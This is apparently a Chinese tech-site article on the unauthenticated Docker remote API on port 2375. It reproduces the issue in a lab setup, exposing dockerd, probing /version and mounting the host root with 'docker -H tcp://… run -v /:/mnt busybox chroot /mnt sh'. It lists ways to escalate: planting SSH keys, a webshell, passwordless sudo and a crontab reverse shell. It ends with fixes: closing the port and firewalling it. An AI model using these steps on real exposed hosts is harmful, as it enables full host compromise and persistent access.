溫馨提示×

您好,登錄后才能下訂單哦!

密碼登錄×
登錄注冊(cè)×
其他方式登錄
點(diǎn)擊 登錄注冊(cè) 即表示同意《億速云用戶服務(wù)條款》

docker remote API漏洞怎么修復(fù)

發(fā)布時(shí)間:2021-12-13 11:56:53 來源:億速云 閱讀:392 作者:iii 欄目:安全技術(shù)

這篇文章主要講解了“docker remote API漏洞怎么修復(fù)”,文中的講解內(nèi)容簡(jiǎn)單清晰,易于學(xué)習(xí)與理解,下面請(qǐng)大家跟著小編的思路慢慢深入,一起來研究和學(xué)習(xí)“docker remote API漏洞怎么修復(fù)”吧!

漏洞描述

docker是一種開源的應(yīng)用容器引擎,這個(gè)漏洞是利用docker對(duì)外開放的一個(gè)api接口,因?yàn)闄?quán)限設(shè)置不當(dāng),導(dǎo)致可以遠(yuǎn)程命令執(zhí)行。

測(cè)試環(huán)境

· 本地一臺(tái)虛擬機(jī),一臺(tái)臨時(shí)創(chuàng)建的阿里云服務(wù)器

· centos7

· docker-ce-18.09.9

漏洞復(fù)現(xiàn)

首先探測(cè)2375端口,如果開放,再構(gòu)造http:localhost:2375/version請(qǐng)求,如果返回包帶有json格式,說明存在該漏洞。

1、安裝docker

配置宿主機(jī)網(wǎng)卡轉(zhuǎn)發(fā)

## 若未配置,需要執(zhí)行如下$ cat <<EOF > /etc/sysctl.d/docker.confnet.bridge.bridge-nf-call-ip6tables = 1net.bridge.bridge-nf-call-iptables = 1net.ipv4.ip_forward=1EOF$ sysctl -p /etc/sysctl.d/docker.conf

Yum安裝配置docker

## 下載阿里源repo文件$ curl -o /etc/yum.repos.d/Centos-7.repo http://mirrors.aliyun.com/repo/Centos-7.repo$ curl -o /etc/yum.repos.d/docker-ce.repo http://mirrors.aliyun.com/docker-ce/linux/centos/docker-ce.repo$ yum clean all && yum makecache## 安裝指定版本yum install -y docker-ce-18.09.9## 配置源加速## https://cr.console.aliyun.com/cn-hangzhou/instances/mirrorsmkdir -p /etc/dockervi /etc/docker/daemon.json{ "registry-mirrors" : [ "https://8xpk5wnt.mirror.aliyuncs.com" ]}## 設(shè)置開機(jī)自啟systemctl enable docker systemctl daemon-reload## docker daemonps aux |grep docker## containerdps aux|grep containerdsystemctl status containerd

2、開啟2375端口,提供外部訪問

編輯docker文件:/usr/lib/systemd/system/docker.service

vim /usr/lib/systemd/system/docker.service

修改ExecStart行為下面內(nèi)容

ExecStart=/usr/bin/dockerd -H tcp://0.0.0.0:2375 -H unix://var/run/docker.sock \

docker remote API漏洞怎么修復(fù)

重新加載docker配置

systemctl daemon-reload # 加載docker守護(hù)線程systemctl restart docker # 重啟docker

· 查看端口

docker remote API漏洞怎么修復(fù)

3、信息收集端口

docker remote API漏洞怎么修復(fù)

4、查看返回包

docker remote API漏洞怎么修復(fù)

5、添加、查看本地密鑰

docker remote API漏洞怎么修復(fù)

6、遠(yuǎn)程創(chuàng)建docker并添加密鑰

docker -H tcp://8.135.2.198 run --rm -it -v /:/mnt busybox chroot /mnt sh

· 簡(jiǎn)單解釋一下參數(shù)的含義:

· –rm 容器停止時(shí),自動(dòng)刪除該容器

· -v 掛載目錄。格式為 系統(tǒng)目錄:容器目錄

· -i 指示 docker 要在容器上打開一個(gè)標(biāo)準(zhǔn)的輸入接口

· -t 指示 docker 要?jiǎng)?chuàng)建一個(gè)偽 tty 終端,連接容器的標(biāo)準(zhǔn)輸入接口,之后用戶就可以通過終端進(jìn)行輸入

docker remote API漏洞怎么修復(fù)

7、本地連接目標(biāo)宿主機(jī)

docker remote API漏洞怎么修復(fù)

漏洞危害

通過此漏洞,可在docker命令執(zhí)行,并且影響宿主機(jī)。

總結(jié)流程

引用網(wǎng)上的一些總結(jié)流程

1. Docker是以root權(quán)限運(yùn)行的,這是所有姿勢(shì)的前提

1. Docker在運(yùn)行一個(gè)容器的時(shí)候可以將宿主機(jī)上的一個(gè)目錄掛載到容器內(nèi)的一個(gè)目錄,我們可以參考redis未授權(quán)訪問漏洞,將宿主機(jī)的/root/.ssh目錄掛載到容器上,然后寫入公鑰。如果有web目錄的話,最差也能上一個(gè)webshell。

1. 有些服務(wù)器不允許root登錄,可以寫入其他用戶的.ssh/目錄下(通過查看/etc/ssh/sshd_config目錄),然后修改/etc/sudoer中的文件,配置為sudo免密碼,切換為root

1. 還可以通過crontab寫計(jì)劃任務(wù)反彈shell

漏洞修復(fù)

1.關(guān)閉2375端口 (尤其是公網(wǎng)情況下一定要禁用此端口)

2.在防火墻上配置禁止外網(wǎng)訪問2375端口

感謝各位的閱讀,以上就是“docker remote API漏洞怎么修復(fù)”的內(nèi)容了,經(jīng)過本文的學(xué)習(xí)后,相信大家對(duì)docker remote API漏洞怎么修復(fù)這一問題有了更深刻的體會(huì),具體使用情況還需要大家實(shí)踐驗(yàn)證。這里是億速云,小編將為大家推送更多相關(guān)知識(shí)點(diǎn)的文章,歡迎關(guān)注!

向AI問一下細(xì)節(jié)

免責(zé)聲明:本站發(fā)布的內(nèi)容(圖片、視頻和文字)以原創(chuàng)、轉(zhuǎn)載和分享為主,文章觀點(diǎn)不代表本網(wǎng)站立場(chǎng),如果涉及侵權(quán)請(qǐng)聯(lián)系站長(zhǎng)郵箱:is@yisu.com進(jìn)行舉報(bào),并提供相關(guān)證據(jù),一經(jīng)查實(shí),將立刻刪除涉嫌侵權(quán)內(nèi)容。

AI